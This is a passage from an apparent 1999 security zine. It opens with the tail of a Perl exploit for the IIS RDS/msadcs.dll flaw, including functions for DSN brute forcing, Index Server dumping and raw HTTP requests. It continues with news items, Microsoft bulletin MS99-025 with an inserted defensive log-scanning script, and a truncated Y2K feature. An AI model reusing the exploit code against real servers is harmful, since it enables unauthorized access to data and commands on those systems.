$mdb)){ print "Success!\n"; save (4,4,$drive . $dir . $mdb,""); exit; }}}} } ############################################################################## sub hork_idx { print "\nAttempting to dump Index Server tables...\n"; print " NOTE: Sometimes this takes a while, other times it stalls\n\n"; $reqlen=length( make_req(4,"","") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw2(make_header() . make_req(4,"","")); if (rdo_success(@results)){ my $max=@results; my $c; my %d; for($c=19; $c<$max; $c++){ $results[$c]=~s/\x00//g; $results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g; $results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g; $results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/; $d{"$1$2"}="";} foreach $c (keys %d){ print "$c\n"; } } else {print "Index server not installed/query failed\n"; }} ############################################################################## sub dsn_dict { open(IN, "<$args{e}") || die("Can't open external dictionary\n"); while(){ $hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print "."; next if (!is_access("DSN=$dSn")); if(create_table("DSN=$dSn")){ print "$dSn successful\n" if(!defined $args{V}); if(run_query("DSN=$dSn")){ print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; }}} print "\n"; close(IN);} ############################################################################## sub sendraw2 { # ripped and modded from whisker sleep($delay); # it's a DoS on the server! At least on mine... 
my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ open(OUT,">raw.out"); my @in; select(S); $|=1; print $pstr; while(){ print OUT $_; push @in, $_; print STDOUT ".";} close(OUT); select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); }} ############################################################################## sub content_start { # this will take in the server headers my (@in)=@_; my $c; for ($c=1;$c<500;$c++) { if($in[$c] =~/^\x0d\x0a/){ if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; } else { return $c+1; }}} return -1;} # it should never get here actually ############################################################################## sub funky { my (@in)=@_; my $error=odbc_error(@in); if($error=~/ADO could not find the specified provider/){ print "\nServer returned an ADO miscofiguration message\nAborting.\n"; exit;} if($error=~/A Handler is required/){ print "\nServer has custom handler filters (they most likely are patched)\n"; exit;} if($error=~/specified Handler has denied Access/){ print "\nADO handlers denied access (they most likely are patched)\n"; exit;}} ############################################################################## sub has_msadc { my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n"); my $base=content_start(@results); return if($results[$base]=~/Content-Type: application\/x-varg/); my @s=grep("Server",@results); if($s[0]!~/IIS/){ print "Doh! They're not running IIS.\n" } else { print "/msadc/msadcs.dll was not found.\n";} exit;} ############################################################################## sub get_name { # this was added last minute my $msadc=<.,?]//g; print "Machine name: $results[$base+6]\n";} ############################################################################## # Note: This is not a good example of precision code. It is very # redundant and has a few kludges. 
# I have been adding features in one at
# a time, so it has resulted in redundant functions and patched code.
# I will be rewriting it in the future, sometime.  Look for the newer code
# revisions at www.technotronic.com/rfp/
# This may also be included in the NT-PTK/P.  If you don't know what that
# is, just wait and see. :)
##############################################################################

     @HWA

42.0 High school crackers
     ~~~~~~~~~~~~~~~~~~~~

     From http://www.net-security.org/
     by BHZ, Tuesday 20th July 1999 on 9:37 pm CET

     A hacker broke into the computer system at East Chapel Hill High School
     and ruined two years' worth of the principal's work. School officials
     said that their system had been penetrated before, but no such damage
     was done. They learned their lesson and are now installing 12,000
     dollars' worth of security software.

     @HWA

43.0 Unauthorized Access to IIS Servers through ODBC Data Access with RDS
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From http://www.net-security.org/
     by BHZ, Tuesday 20th July 1999 on 3:30 pm CET

     Microsoft re-released Microsoft Security Bulletin MS98-004, issued
     July 17, 1998. As they say: "It has recently been brought to our
     attention that this vulnerability has been used to gain unauthorized
     access to Internet-connected systems that have instructions in
     MS98-004". Just a reminder: this advisory deals with the RDS
     DataFactory object, a component of Microsoft Data Access Components
     (MDAC).
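     Since the bulletin's checks are easiest to verify from the server side, here is an added example (not code from the zine, rfp's script, or Microsoft) that scans IIS W3C extended log lines for requests to the RDS entry point the script above probes, /msadc/msadcs.dll, and tells reachable endpoints apart from probes that the MS99-025 mitigations rejected. The log excerpt, the IP addresses and the field layout are constructed for the example.

```python
"""Flag RDS DataFactory (MS99-025) probing in IIS W3C extended logs.

Added example: the log excerpt below is constructed, not real traffic.
The endpoint path is the one the bulletin and the probe script use;
the field layout and addresses are assumptions of this example.
"""
from collections import Counter

# The RDS entry point served from the /msadc virtual directory.
RDS_ENDPOINT = "/msadc/msadcs.dll"

# Constructed IIS 4.0 W3C extended log excerpt (addresses are documentation ranges).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Server 4.0
#Version: 1.0
#Fields: date time c-ip cs-method cs-uri-stem sc-status
1999-07-20 03:30:01 10.0.0.5 GET /default.asp 200
1999-07-20 03:30:02 192.0.2.77 GET /msadc/msadcs.dll 200
1999-07-20 03:30:03 192.0.2.77 POST /msadc/msadcs.dll 200
1999-07-20 03:30:04 192.0.2.77 POST /msadc/msadcs.dll 200
1999-07-20 03:31:10 198.51.100.9 GET /MSADC/msadcs.dll 404
1999-07-20 03:31:11 198.51.100.9 POST /MSADC/msadcs.dll 403
1999-07-20 03:32:00 10.0.0.5 GET /images/logo.gif 200
"""


def parse_w3c(text):
    """Yield one dict per record, naming columns from the #Fields directive."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue  # other directives carry no records
        if fields is None:
            raise ValueError("record before #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            raise ValueError("field count mismatch: %r" % raw)
        yield dict(zip(fields, values))


def classify(rec):
    """Return a finding label for an RDS-endpoint request, or None otherwise."""
    stem = rec.get("cs-uri-stem", "").lower()   # IIS paths are case-insensitive
    if not stem.startswith(RDS_ENDPOINT):
        return None
    method = rec.get("cs-method", "").upper()
    status = rec.get("sc-status", "")
    if status.startswith("2"):
        # /msadc is still served. A 2xx on POST means msadcs.dll processed an
        # RDS request; the log cannot tell a successful query from an ODBC
        # error body (both come back 200), so treat it as the serious case.
        return "rds-post-accepted" if method == "POST" else "rds-endpoint-reachable"
    # 403/404/500: the vdir is gone, anonymous access is off, or a custom
    # handler rejected the call. Still worth knowing who is knocking.
    return "rds-probe-rejected"


def scan(text):
    """Return findings as (client ip, label, status) triples, in log order."""
    findings = []
    for rec in parse_w3c(text):
        label = classify(rec)
        if label is not None:
            findings.append((rec["c-ip"], label, rec["sc-status"]))
    return findings


def exposure_summary(findings):
    """Per-client counts of each label, so a reachable endpoint stands out."""
    summary = {}
    for ip, label, _status in findings:
        summary.setdefault(ip, Counter())[label] += 1
    return summary


def endpoint_exposed(findings):
    """True if any RDS request got a 2xx: the MS99-025 steps are not all in place."""
    return any(label != "rds-probe-rejected" for _ip, label, _status in findings)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ip, counts in exposure_summary(found).items():
        print(ip, dict(counts))
    print("RDS endpoint reachable:", endpoint_exposed(found))
```

     Point it at a real log by replacing SAMPLE_LOG with the file contents; a host where the /msadc directory was removed or anonymous access disabled should only ever produce "rds-probe-rejected".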
     Read the re-released advisory at the URL below:
     http://www.microsoft.com/security/bulletins/ms99-025.asp

     --===Microsoft Security Advisor Program: Microsoft Security Bulletin (MS99-025)===--

     Microsoft Security Bulletin (MS99-025)

     Re-Release: Unauthorized Access to IIS Servers through ODBC Data Access
     with RDS

     *Originally Released as MS98-004, July 17, 1998*
     *Re-Released as MS99-025, July 19, 1999*

     Preface

     This bulletin is a re-release of Microsoft Security Bulletin MS98-004
     (http://www.microsoft.com/security/bulletins/ms98-004.asp), issued
     July 17, 1998. It has recently been brought to our attention that this
     vulnerability has been used to gain unauthorized access to
     Internet-connected systems that have not been updated as per the
     instructions in MS98-004. The intent of re-releasing this bulletin is
     to serve as a reminder about this vulnerability, to restate the threat,
     and encourage system administrators to evaluate their systems to
     determine if their systems have been correctly configured and updated
     to protect against this vulnerability.

     Summary

     Microsoft encourages the following actions be taken on systems that
     have Microsoft® Internet Information Server 3.0 or 4.0 and Microsoft
     Data Access Components 1.5, both of which are installed during a
     default installation of the Windows NT® 4.0 Option pack:

     + Install the latest version of MDAC (currently MDAC 2.1 SP2)

     However, simply upgrading from MDAC 1.5 to MDAC 2.0, or MDAC 2.1 is not
     sufficient. For systems not explicitly utilizing RDS functionality, you
     should also:

     + Delete the /msadc virtual directory from the default Web site, or
     + Apply registry settings that disable the DataFactory object. (See the
       Q for the registry settings to adjust, or to download a .REG file
       that can make the changes for you.)

     For systems implicitly utilizing RDS functionality, you should:

     + Disable Anonymous Access for the /msadc directory in the default Web
       site, and/or
     + Create a Custom Handler to control or filter incoming requests:
       http://www.microsoft.com/Data/ado/rds/custhand.htm

     If you do not complete these steps, unauthorized access as described
     below may still be possible.

     Frequently asked questions regarding this vulnerability and updating
     systems to protect against it can be found at
     http://www.microsoft.com/security/bulletins/MS99-025faq.asp

     Issue

     The RDS DataFactory object, a component of Microsoft Data Access
     Components (MDAC), exposes unsafe methods. When installed on a system
     running Internet Information Server 3.0 or 4.0, the DataFactory object
     may permit an otherwise unauthorized web user to perform privileged
     actions, including:

     + Allowing unauthorized users to execute shell commands on the IIS
       system as a privileged user.
     + On a multi-homed Internet-connected IIS system, using MDAC to tunnel
       SQL and other ODBC data requests through the public connection to a
       private back-end network.
     + Allowing unauthorized accessing to secured, non-published files on
       the IIS system.

     Affected Software Versions

     + Microsoft Internet Information Server 3.0 or 4.0 that have or have
       had Microsoft Data Access Components 1.5 installed on it.

     NOTE: IIS can be installed as part of other Microsoft products like
     Microsoft BackOffice and Microsoft Site Server.

     NOTE: MDAC 1.5 is installed during a default installation of the
     Windows NT 4.0 Option Pack.

     Patch Availability

     Newer versions of Microsoft Data Access Components (MDAC versions 2.0
     and 2.1) resolve these known vulnerabilities. However, a system that had
     MDAC 1.5 installed on it, and then upgraded to MDAC 2.0 or MDAC 2.1 must
     still take actions to disable the DataFactory object. (See the Q for
     the registry settings to adjust, or to download a .REG file that can
     make the changes for you.)

     Current versions of Microsoft Data Access Components can be downloaded
     from the following web site:

     + Microsoft Data Access Download Site:
       http://www.microsoft.com/data/download.htm

     More Information

     Please see the following references for more information related to
     this issue.

     + Microsoft Security Bulletin MS99-025: Frequently Asked Questions,
       http://www.microsoft.com/security/bulletins/MS99-025faq.asp
     + Microsoft Knowledge Base (KB) article Q184375, *Security Implications
       of RDS 1.5, IIS, and ODBC*,
       http://support.microsoft.com/support/kb/articles/q184/3/75.asp
     + Microsoft Universal Data Access Download Page,
       http://www.microsoft.com/data/download.htm
     + Installing MDAC Q,
       http://www.microsoft.com/data/MDAC21info/MDACinstQ.htm
     + Microsoft Security Advisor web site,
       http://www.microsoft.com/security/default.asp
     + IIS Security Checklist,
       http://www.microsoft.com/security/products/iis/CheckList.asp

     Obtaining Support on this Issue

     Microsoft Data Access Components (MDAC) is a fully supported set of
     technologies. If you require technical assistance with this issue,
     please contact Microsoft Technical Support. For information on
     contacting Microsoft Technical Support, please see
     http://support.microsoft.com/support/contact/default.asp.

     Acknowledgments

     Microsoft acknowledges Greg Gonzalez of ITE
     (http://www.infotechent.net) for bringing additional information
     regarding this vulnerability to our attention.
     Microsoft also acknowledges Russ Cooper (NTBugTraq,
     http://www.ntbugtraq.com/) for his assistance around this issue.

     Revisions

     + July 19, 1999: Bulletin Created as re-release of MS98-004.

     http://www.microsoft.com/security

     -------------------------------------------------------------------------------
     THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED
     "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL
     WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF
     MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL
     MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES
     WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS
     OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR
     ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME
     STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR
     CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT
     APPLY.

     © 1999 Microsoft Corporation. All rights reserved. Terms of Use.

     @HWA

44.0 Whose fault is the Y2K bug?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From http://www.net-security.org/ Y2K PORTFOLIO
     by BHZ, Tuesday 20th July 1999 on 3:11 pm CET

     The Washington Post wrote a terrific article on the Y2K situation, its
     past and its present. They even contacted "the man responsible" for the
     Y2K bug, Robert Bemer. He wrote the American Standard Code for
     Information Interchange (ASCII), popularized the use of the backslash,
     and invented the "escape" sequence in programming. In the late 50's he
     also helped write COBOL. He said that the early programmers were
     unconcerned about the year 2000 because they expected their programs to
     last only a few years, and that is how the Y2K "bug" started. Read the
     whole article below.

     THE MILLENNIUM BUG

     We Know It Can Hurt Us. We Know It Didn't Have To Be. What We Didn't
     Know, Until Today, Was Whom We Can Blame for Letting It Loose.
     By Gene Weingarten
     Washington Post Staff Writer
     Sunday, July 18, 1999; Page F01

     We are knocking at the door of a high-rise apartment in Baileys Crossroads, with a question so awful we are afraid to ask it. We do not wish to cause a heart attack.

     A woman invites us in and summons her husband, who shuffles in from another room. She is 78. He is 82. They met in the 1960s as middle-management civil servants, specialists in an aspect of data processing so technical, so nebbishy, that many computer professionals disdain it. He was her boss. Management interface blossomed into romance. Their marriage spans three decades. They are still in love.

     "You know how we use Social Security numbers alone to identify everyone?" she says. She points proudly to her husband. "That all started with this kid!"

     The kid has ice cube spectacles and neck wattles. He has been retired for years. Some of his former colleagues guessed he was deceased. His phone is unlisted. We located him through a mumbled tip from a man in a nursing home, followed up with an elaborate national computer search. Computers--they're magic.

     It is still early. We have, alas, roused them from bed. She is feisty. He is pleasantly grumpy. They are nice people.

     Here is what we have to ask him: Are you the man who is responsible for the greatest technological disaster in the history of mankind? Did you cause a trillion-dollar mistake that some believe will end life as we know it six months from now, throwing the global economy into a tailspin, disrupting essential services, shutting down factories, darkening vast areas of rural America, closing banks, inciting civic unrest, rotting the meat in a million freezers, pulling the plug on life-sustaining medical equipment, blinding missile defense systems, leaving ships adrift on the high seas, snarling air traffic, causing passenger planes to plummet from the skies?

     Obligingly, he awaits the question. He is wearing pajamas.

     A Hot Date

     By now, everyone knows that on Jan. 1, 2000, something dreadful will happen on a global scale. Or possibly it will not. Experts are divided. This much is indisputable: To prevent it, billions of dollars have already been expended not only by government, which is prone to squandering money on foolishness, but also by big business, which is not. This is no empty scare.

     Technology has been the propulsive force behind civilization, but from time to time technology has loudly misfired. In the name of progress, there have been profound blunders: Filling zeppelins with hydrogen. Treating morning sickness with Thalidomide. Constructing aqueducts with lead pipes, poisoning half the population of ancient Rome.

     Still, there is nothing that quite compares with the so-called "Millennium Bug." It is potentially planetary in scope. It is potentially catastrophic in consequence. And it is, at its heart, stunningly stupid. It is not like losing a kingdom for want of a nail; it is like losing a kingdom because some idiot made the nails out of marshmallows.

     On Jan. 1, 2000, huge numbers of computers worldwide are expected to fail because, despite the foreseeable folly of it, they have always been programmed to think of the year in two digits only. The two-digit year is a convention as ancient as the feather pen--writing the date on a personal letter with an apostrophe in the year, implying a prefix of 17- or 18- or 19-. But reading an apostrophe requires sentience and judgment. Computers possess neither. They cannot distinguish an "00" meaning 1900 from an "00" meaning 2000. When asked, for example, to update a woman's age on Jan. 1, 2000, a computer might subtract her year of birth (say, '51) from the current year ('00), and conclude she will not be born for another 51 years.

     A human would instantly realize the nature of the error, adjust his parameters, and recalculate. Computers aren't built that way. They require absolute, either-or, plus-or-minus, binary logic at every step of their operation, and if this process is stymied even momentarily, if there is a juncture at which neither plus nor minus yields a comprehensible response, a computer will react immaturely. Sometimes it will start acting out--doing petulant, antisocial things such as coughing out daffy data or obliterating files. More often, the computer will simply burst into tears. It will shut itself down.

     The permutations of the Y2K problem are bewildering. If General Motors has fixed its computers, that's swell; but if the hydroelectric plant that sells power to the subcontractor who imports the rubber that is used to make tires for GM cars has not fixed its problem, the GM assembly line closes down anyway. Plus, the Y2K problem is hard-wired into millions of microprocessor chips, independent mini-brains that are embedded in things like automobiles, traffic control systems, medical equipment, factory control panels; some businesses aren't even certain where all their microprocessors are.

     Never has a calamity been so predictable, and so inevitable, tied to a deadline that can be neither appealed nor postponed. Diplomacy is fruitless. Nuclear deterrence isn't a factor. This can't be filibustered into the next Congress.

     Y2K has powerful, nearly mystical, themes. For some religious fundamentalists who have long been predicting a millennial apocalypse, the avenging instrument has finally loomed into view. For Luddites aghast at the excesses of the industrialized world, Y2K is the perfect comeuppance. For anyone who has ever read Vonnegut or Eliot, the ironies are lush. This is the way the world ends. Not with a bang but a . . . crash.

     Because society has been gamely focused on working together to forestall disaster, not much effort has so far been expended on senseless finger-pointing. The civility will end after the first of the year. Finger-pointing will no longer be senseless. One question will be asked repeatedly, mostly by attorneys gearing up for lawsuits: Who screwed up?

     The search for a culprit is an honored American tradition. It nourishes both law and journalism. When things go bad, we demand a fall guy. A scapegoat. A patsy. Today we'll search for one, and find him.

     The Unsquashable Bug

     First, it isn't really a "bug." The term "computer bug" was coined by Navy computer pioneer Grace Hopper in the 1950s after a moth got into one of her machines and it went haywire. A "bug" implies something unforeseeable. The Y2K problem wasn't just foreseeable, it was foreseen.

     Writing in February 1979 in an industry magazine called Interface Age, computer industry executive Robert Bemer warned that unless programmers stopped dropping the first two digits of the year, programs "may fail from ambiguity in the year 2000." This is geekspeak for the Y2K problem.

     Five years later, the husband-wife team of Jerome T. and Marilyn J. Murray wrote it much more plainly. In a book called "Computers in Crisis: How to Avoid the Coming Worldwide Computer Systems Collapse," they predicted Y2K with chilling specificity. Few people read it. The year was 1984, and to many, the book seemed very 1984-ish: a paranoid Orwellian scenario. ComputerWorld magazine reviewed it thus: "The book overdramatizes the date-digit problem. . . . Much of the book can be overlooked."

     How could we have been so blind? Basically, we blinded ourselves, like Oedipus. It seemed like a good idea at the time.

     Imagine you own a car that gets one mile to the gallon, and every additional ounce in the passenger compartment further reduces the gas efficiency. You would do anything you could to lighten your load. You might even drive naked, gawkers be damned.

     That's pretty much what occurred back in the 1950s, in the early days of computers. Simple arithmetic calculations required a machine the dimensions of a minivan. Memory was contained not in chips the size of fingernails but in electrostatic vacuum tubes the size of cucumbers; small stores of memory cost tens of thousands of dollars. Data were entered by punching holes in stiff cards the size of airline tickets, each containing only 80 characters of information. Businesses needed warehouses to store tons of cards. Anything that reduced the amount of data, even slightly, saved money.

     What followed was nearly inevitable. Programmers built a house of cards. Most of them employed abbreviations, particularly to represent prosaic bits of recurring data, such as the date. They expressed the month, day and year in a total of six digits rather than eight. Many programmers say today that they knew they were being sloppy. But there were greater priorities. So they drove naked.

     Why didn't people realize earlier the magnitude of the problem they were creating? And when they did realize it, why was the problem so hard to solve?

     Have Run, Will Travel

     We sought the answer from the first man to ask the question. Robert Bemer, the original Y2K whistleblower, lives in a spectacular home on a cliff overlooking a lake two hours west of a major American city. We are not being specific because Bemer has made this a condition of the interview. We can say the car ride to his town is unrelievedly horizontal. The retail stores most in evidence are fireworks stands and taxidermists.

     In his driveway, Bemer's car carries the vanity tag "ASCII." He is the man who wrote the American Standard Code for Information Interchange, the language through which different computer systems talk to each other. He also popularized the use of the backslash, and invented the "escape" sequence in programming. You can thank him, or blaspheme him, for the ESC key. In the weenieworld of data processing, he is a minor deity.

     We had guessed Bemer would be reassuring about the Y2K problem. Our first question is why the heck he recently moved from a big city all the way out to East Bumbleflop, U.S.A.

     It's a good place to be next New Year's Eve, he says.

     From a kitchen drawer he extracts two glass cylinders about the size of the pneumatic-tube capsules at a drive-through teller. Each is filled with what appears to be straw. "They're Danish," he says. "They cost $500. We ran water with cow[poop] through them and they passed with flying colors." They're filters, to purify water. If Y2K is as bad as he fears, he says, cocking a thumb toward his backyard, "we can drain the lake."

     Bemer is 79. He looks flinty, like an aging Richard Boone still playing Paladin. He has started a company, Bigisoft, that sells businesses a software fix for the Y2K problem. So, for selfish reasons, he doesn't mind if there is widespread concern over Y2K, though he swears he really thinks it is going to be bad. That's why he has requested that we not mention the town in which he lives. He doesn't want nutballs descending on him in the hellish chaos of Jan. 1, somehow blaming him.

     Who, then, is to blame?

     Bemer rocks back in his chair and offers a commodious smile. In one sense, he says, he is.

     Binary Colors

     In the late 1950s, Bemer helped write COBOL, the Esperanto of computer languages. It was designed to combine and universalize the various dialects of programming. It also was designed to open up the exploding field to the average person, allowing people who weren't mathematicians or engineers to communicate with machines and tell them what to do. COBOL's commands were in plain English. You could instruct a computer to MOVE, ADD, SEARCH or MULTIPLY, just like that.

     It was a needed step, but it opened the field of programming, Bemer says, to "any jerk."

     "I thought it would open up a tremendous source of energy," he says. "It did. But what we got was arson."

     There was no licensing agency for programmers. No apprenticeship system. "Even in medieval times," Bemer notes dryly, "there were guilds." When he was an executive at IBM, he said, he sometimes hired people based on whether they could play chess.

     There was nothing in COBOL requiring or even encouraging a two-digit year. It was up to the programmers. If they had been better trained, Bemer says, they might have known it was unwise. He knew. He blames the programmers, but he blames their bosses more, for caving in to shortsighted client demands for cost-saving.

     "What can I say?" he laughs. "We're a lousy profession."

     Some contend that the early programmers were unconcerned about the year 2000 because they expected their programs to last only a few years. If that is true, it was naive. Computers are forever becoming obsolete, replaced by faster, better technologies, but the programs they run can be nearly immortal. A good program is self-perpetuating, tested over time, wrinkles ironed out through updates, a solid foundation for all that follows. The house above it may be fancified, with spiffy new wings and porticoes, but the foundation remains.

     Which goes to the heart of the Y2K problem. The longer a program is used, the larger the database and supporting material that grow around it. If, say, a program records and cross-references the personnel records in the military, and if the program itself abbreviates years with two digits, then all stored data, all files, all paper questionnaires that servicemen fill out, will have two-digit years. The cost of changing this system goes way beyond the cost of merely changing the computer program. It's like losing your wallet. Replacing the money is no sweat. Replacing your credit cards and ATM card and driver's license and business-travel receipts can be a living nightmare.

     And so, even after computer memory became cheaper, and data storage became less cumbersome, there was still a powerful cost incentive to retain a two-digit year. Some famously prudent people programmed with a two-digit date, including Federal Reserve Chairman Alan Greenspan, who did it when he was an economics consultant in the 1960s. Greenspan sheepishly confessed his complicity to a congressional committee last year. He said he considered himself very clever at the time.

     In their omnibus 1997 manual for lawyers planning Y2K litigation--an excellent if unnerving document of 600-plus pages--attorneys Richard D. Williams and Bruce T. Smyth suggest that IBM and other computer manufacturers might be partially at fault for not addressing the problem in the early '60s by advising their customers of the wisdom of a four-digit year. In 1964, IBM came out with its System/360 computers, which revolutionized the industry. It built upon existing programs, yet required much new software. Should IBM have seized the moment to make things right?

     "That would have been stupid," responds Frederick Brooks, a University of North Carolina computer science professor. In the 1960s, Brooks was IBM's project manager for the System/360. The average 360, he says, had either 16 or 32 kilobytes of memory, 12 of which were needed to run the operating system. What was left was less memory than is available today in a hand-held personal organizer from Radio Shack. Every possible memory-conserving device had to be employed. And the year 2000 was far, far away.

     "I never heard anyone seriously propose a four-digit year," he recalls. It is not as if a two-digit year was set in stone anywhere, he says. It just became a logical convention, across the industry.

     So Y2K was inevitable?

     No. As time passed and memory became cheaper and the end of the century got closer, Brooks says, "the cost of using four-digit years went down gradually, and the wisdom of using them went up gradually." When did the two lines cross on the graph? Around 1970, he says. But competitive pressures kept managers from making that expensive decision. By the mid-1980s, it was too late. Computers were everywhere, their programs hopelessly infected with the problem.

     Could anything have changed corporate attitudes earlier? The former IBM man ponders this. "If we had adopted industry-wide standards by some standards group, standards everyone would have had to follow, there would be no competitive pressures for cost." But nothing like that ever happened, he says.

     Actually, Brooks is wrong. Something very much like that happened.

     A group did adopt a written standard for how to express dates in computers. We are looking at it now. It is a six-page document. It is so stultifying that it is virtually impossible to read. It is titled "Federal Information Processing Standards Publication 4: Specifications for Calendar Date." It is dated Nov. 1, 1968, and took effect on Jan. 1, 1970, precisely when Brooks says the lines on the graph crossed, precisely when a guiding hand might have helped.

     On Page 3, a new federal standard for dates is promulgated.

     Sometimes, someone makes a reasonable-sounding statement that, in the merciless glare of history, seems dreadfully unwise: "Separate but equal" is one of these. Also: "I believe it is peace in our time," an opinion rendered by Neville Chamberlain weeks before the outbreak of World War II.

     Federal Information Processing Standards Publication 4, Paragraph 4 and Subparagraph 4.1, is another of those statements. Here it is, in its entirety:

     Calendar Date is represented by a numeric code of six consecutive positions that represent (from left to right, in high to low order sequence) the Year, the Month and the Day, as identified by the Gregorian Calendar. The first two positions represent the units and tens identification of the Year. For example, the Year 1914 is represented as 14, and the Year 1915 is represented as 15.

     Ah. The Y2K problem. Set in stone. By the United States government.

     FIPS 4, as it was called, was limited in scope. It applied only to U.S. government computers, and only when they were communicating from agency to agency. Still, it was the first national computer date standard ever adopted, and it influenced others that followed. It would have affected any private business that wanted to communicate with government computers. It might have been a seed for change, had it mandated a four-digit year.

     It was a missed opportunity.

     Who screwed up?

     The Standard Bearers

     Harry S. White Jr., 64, places a briefcase on the table. It is heavy. He has documents.

     We are meeting in a conference room at a Holiday Inn in Morgantown, W.Va., to plumb ancient history. White helped write FIPS 4; at the time he was with the National Bureau of Standards.

     White says he is pleased to meet us. He holds out a hand. In it is a Bible. "Be careful with that," he says mildly. "It's powerful. If you open it, it will have an impact on your life."

     White is West Virginia chairman of The Gideons International, the gentlemen's organization that places Bibles in hotel rooms. He is now semi-retired, but for much of his life he was an expert on standardizing computer codes, a scientist whose field involved the proper sequencing of digits and symbols.

     God, they say, is in the details.

     In the 1960s and '70s, White was one of a few dozen computer experts who met regularly on committees to try to get government and industry to use identical conventions in programming. It was an important job, but a thankless one. Programmers sometimes consider themselves as creative as novelists; to them, standards experts are squinty-eyed, pencil-necked editors--necessary, perhaps, but nit-picky and annoying. In this insular world, all debates are about small things; so small things can become very large.

     Harry White says that back in 1968, he was opposed to a two-digit year. He did not exactly foresee the extent of the Y2K problem but there was something about two digits that offended his sense of the rightness of things: "If it is four digits," he says, "it is everlasting."

     But FIPS 4 was produced by a committee, White explains. A committee. When a committee tries to design a horse, it can come up with a jackass.

     On the committee were representatives of several government agencies, among them the Office of Management and Budget, NASA, the General Services Administration and the Department of Defense. Defense was by far the biggest computer user in the federal government, probably in the world, White says, and its input was disproportionately influential. The Defense Department, he says, opposed the four-digit year because it would have meant rewriting all its programs, and all the supporting data. Defense had bigger worries. We were neck deep in Vietnam.

     Besides, White says, there was a much larger issue on the table: the precise order in which the day, month and year would be written. DOD wanted to keep its system, familiar to Europeans and the American military: day/month/year. Others wanted the standard month/day/year sequence, the way Americans write it on personal correspondence. Whether years would be four digits or two seemed a minor matter. Even those people like Bemer and White, who sensed a problem, had no real understanding of its potential scope: In the 1970s few people anticipated how thoroughly computers would come to dominate our lives.

     Eventually, White says, Defense gave up on the issue of the order of the date, but it held fast on the two-digit year.

     Three years later, the American National Standards Institute issued its own voluntary standard for expression of date in computer language. This was ANSI standard X3.30, which was drafted by, and for, both government and industry. Harry White was chairman of the subcommittee that addressed the issue of date.
The Defense Department, White says, remained solidly opposed to change: It stuck to its guns, as it were. The initial proposal was for a two-digit year, just like FIPS. But eventually, White said, he and others prevailed. The final standard was for a four-digit year, including the prefix 19- or 20-. But as a compromise with the Defense Department, White says, the Standards Institute added an option: Programmers could stick with a two-digit year if they wanted to. That gave everyone an out. In essence, government and business programmers could choose to adopt the recommended standard, at the cost of many millions of dollars, or they could ignore it completely, without technically having committed a sin. "That," says Robert Bemer, "was devastating. It was an excuse to put it on the shelf." Who screwed up? Was anyone in particular behind this? Harry White shuffles his papers. "The director of data standards for the Office of the Secretary of Defense. I used to work for him." Who was he? "I don't want to give the impression that I was a hero and he was a bad guy. There was just a difference in making judgments and decisions." Give us a name, Harry. "Bill Robertson. He married his assistant, Mildred Bailey. " Harry and Bill Bill and Mildred are amiable, despite being ambushed in their jammies in their Baileys Crossroads apartment. They are wearing socks and slippers. She is redheaded, lean and energetic. He is solidly built, a little deliberate afoot. We tell them why we are there. "Anyone who says the Department of Defense was against the four-digit year is full of crap," Bill Robertson says. "Harry White made that up out of his own imagination, whole cloth." The issue never came up, Robertson said, at least not exactly that way. Robertson and Bailey both deny their office was ever even consulted on the FIPS 4 regulation, though it did have input into the ANSI standards. 
Robertson says he does not recall ever being asked to comment specifically on a four-digit year, though he agrees the Department of Defense did in general oppose major changes to its computer system. Change would have been costly. The various armed services would not have stood for it. "We would have had to change every stinking file," Bailey says. "We would have had a revolt," Robertson says. If someone had ordered them to change, "we would have said, 'Blow it out your airbag.' " However, it was all moot, he claims. The Department of Defense already had a system for recording the date, a system Robertson helped develop and implement back when he was in the Air Force. Robertson wanted it to be a national system. What was their system? It had a two-digit year in it, he says. Aha! But, Robertson says, his system included something else. A date was designated by "data elements." The month, year and day were only three elements of five. There was another element, for optional use, that would have indicated which century it was, and yet another indicating which millennium. If you chose to put those in, it would tell the computer to distinguish between centuries. It was the solution to the Y2K problem, but it was never adopted nationally. Bill's system never would have worked, Harry replies: "See, this is where we ran into that kind of problem with him! This was his definition of data elements, but the rest of the world would not accept this definition!" Harry says Bill was "a very narrow, bullheaded individual. When it came to matters of being able to compromise, he was totally inflexible." Bill says Harry was the bullheaded one. He wouldn't listen to reason. Wouldn't join him in his data elements program. "We had the answer in 1964. Harry never tried to get on board!" Once, Bill says, Harry got into a shouting match with one of Bill's deputies on a philosophical dispute about how 